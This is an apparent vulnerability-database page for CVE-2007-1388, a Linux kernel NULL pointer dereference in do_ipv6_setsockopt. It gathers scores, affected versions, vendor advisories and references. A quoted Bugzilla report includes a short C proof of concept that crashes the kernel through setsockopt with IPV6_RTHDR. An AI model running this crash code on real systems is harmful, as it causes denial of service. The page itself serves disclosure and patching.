CVE-2007-1388
published 2007-03-10CVE-2007-1388: The do_ipv6_setsockopt function in net/ipv6/ipv6_sockglue.c in Linux kernel before 2.6.20, and possibly other versions, allows local users to cause a denial of…
PriorityP413medium4.4CVSS 2.0
AVLACMAuSCNINAC
EXPLOIT
EPSS
0.55%
41.8th percentile
The do_ipv6_setsockopt function in net/ipv6/ipv6_sockglue.c in Linux kernel before 2.6.20, and possibly other versions, allows local users to cause a denial of service (oops) by calling setsockopt with the IPV6_RTHDR option name and possibly a zero option length or invalid option value, which triggers a NULL pointer dereference.
Affected
141 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| linux | linux_kernel | <= 2.6.19.7 | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
CVSS provenance
nvdv2.04.4MEDIUMAV:L/AC:M/Au:S/C:N/I:N/A:C
vendor_ubuntu7.8HIGH
vendor_redhat4.4MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-c6w9-v295-wr3x: The do_ipv6_setsockopt function in net/ipv6/ipv6_sockglue
ghsa_unreviewed·2022-05-01
CVE-2007-1388 [MEDIUM] GHSA-c6w9-v295-wr3x: The do_ipv6_setsockopt function in net/ipv6/ipv6_sockglue
The do_ipv6_setsockopt function in net/ipv6/ipv6_sockglue.c in Linux kernel before 2.6.20, and possibly other versions, allows local users to cause a denial of service (oops) by calling setsockopt with the IPV6_RTHDR option name and possibly a zero option length or invalid option value, which triggers a NULL pointer dereference.
Ubuntu
Linux kernel vulnerabilities
vendor_ubuntu·2007-05-24·CVSS 7.8
CVE-2007-1357 [HIGH] Linux kernel vulnerabilities
Title: Linux kernel vulnerabilities
Summary: Linux kernel vulnerabilities
Philipp Richter discovered that the AppleTalk protocol handler did
not sufficiently verify the length of packets. By sending a crafted
AppleTalk packet, a remote attacker could exploit this to crash the
kernel. (CVE-2007-1357)
Gabriel Campana discovered that the do_ipv6_setsockopt() function did
not sufficiently verifiy option values for IPV6_RTHDR. A local
attacker could exploit this to trigger a kernel crash. (CVE-2007-1388)
A Denial of Service vulnerability was discovered in the
nfnetlink_log() netfilter function. A remote attacker could exploit
this to trigger a kernel crash. (CVE-2007-1496)
The connection tracking module for IPv6 did not properly handle the
status field when reassembling fragmented packets,
Red Hat
security flaw
vendor_redhat·2007-03-08·CVSS 4.4
CVE-2007-1388 [MEDIUM] security flaw
security flaw
The do_ipv6_setsockopt function in net/ipv6/ipv6_sockglue.c in Linux kernel before 2.6.20, and possibly other versions, allows local users to cause a denial of service (oops) by calling setsockopt with the IPV6_RTHDR option name and possibly a zero option length or invalid option value, which triggers a NULL pointer dereference.
No detection rules found.
Bugzilla
CVE-2007-1388 security flaw
bugzilla·2018-08-16·CVSS 4.4
CVE-2007-1388 [MEDIUM] CVE-2007-1388 security flaw
CVE-2007-1388 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
The do_ipv6_setsockopt function in net/ipv6/ipv6_sockglue.c in Linux kernel before 2.6.20, and possibly other versions, allows local users to cause a denial of service (oops) by calling setsockopt with the IPV6_RTHDR option name and possibly a zero option length or invalid option value, which triggers a NULL pointer dereference.
Bugzilla
CVE-2007-1388 NULL pointer dereference in do_ipv6_setsockopt
bugzilla·2007-03-14·CVSS 4.4
CVE-2007-1388 [MEDIUM] CVE-2007-1388 NULL pointer dereference in do_ipv6_setsockopt
CVE-2007-1388 NULL pointer dereference in do_ipv6_setsockopt
There is a NULL pointer dereference in the function do_ipv6_setsockopt in
net/ipv6/ipv6_sockglue.c.
Line 417, opt can be NULL and dereferenced :
opt = ipv6_renew_options(sk, np->opt, optname, // opt = NULL
(struct ipv6_opt_hdr __user *)optval,
optlen);
if (IS_ERR(opt)) {
retv = PTR_ERR(opt);
break;
}
/* routing header option needs extra check */
if (optname == IPV6_RTHDR && opt->srcrt) { // Oops
Those few lines reproduce the bug :
#include
int main(int argc, char **argv) {
int s, optval;
s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);
setsockopt(s, SOL_IPV6, IPV6_RTHDR, &optval, 0);
return 0;
}
Kernel Oops here :
Mar 8 23:57:17 localhost kernel: BUG: unable to handle kernel NULL pointer
dereference at virtual address 0
http://bugzilla.kernel.org/show_bug.cgi?id=8155http://lists.suse.com/archive/suse-security-announce/2007-May/0001.htmlhttp://secunia.com/advisories/24777http://secunia.com/advisories/24901http://secunia.com/advisories/25080http://secunia.com/advisories/25099http://secunia.com/advisories/25392http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.20.4http://www.mandriva.com/security/advisories?name=MDKSA-2007:078http://www.redhat.com/support/errata/RHSA-2007-0169.htmlhttp://www.securityfocus.com/bid/23142http://www.ubuntu.com/usn/usn-464-1http://www.vupen.com/english/advisories/2007/1122https://issues.rpath.com/browse/RPL-1154https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11509http://bugzilla.kernel.org/show_bug.cgi?id=8155http://lists.suse.com/archive/suse-security-announce/2007-May/0001.htmlhttp://secunia.com/advisories/24777http://secunia.com/advisories/24901http://secunia.com/advisories/25080http://secunia.com/advisories/25099http://secunia.com/advisories/25392http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.20.4http://www.mandriva.com/security/advisories?name=MDKSA-2007:078http://www.redhat.com/support/errata/RHSA-2007-0169.htmlhttp://www.securityfocus.com/bid/23142http://www.ubuntu.com/usn/usn-464-1http://www.vupen.com/english/advisories/2007/1122https://issues.rpath.com/browse/RPL-1154https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11509
2007-03-10
Published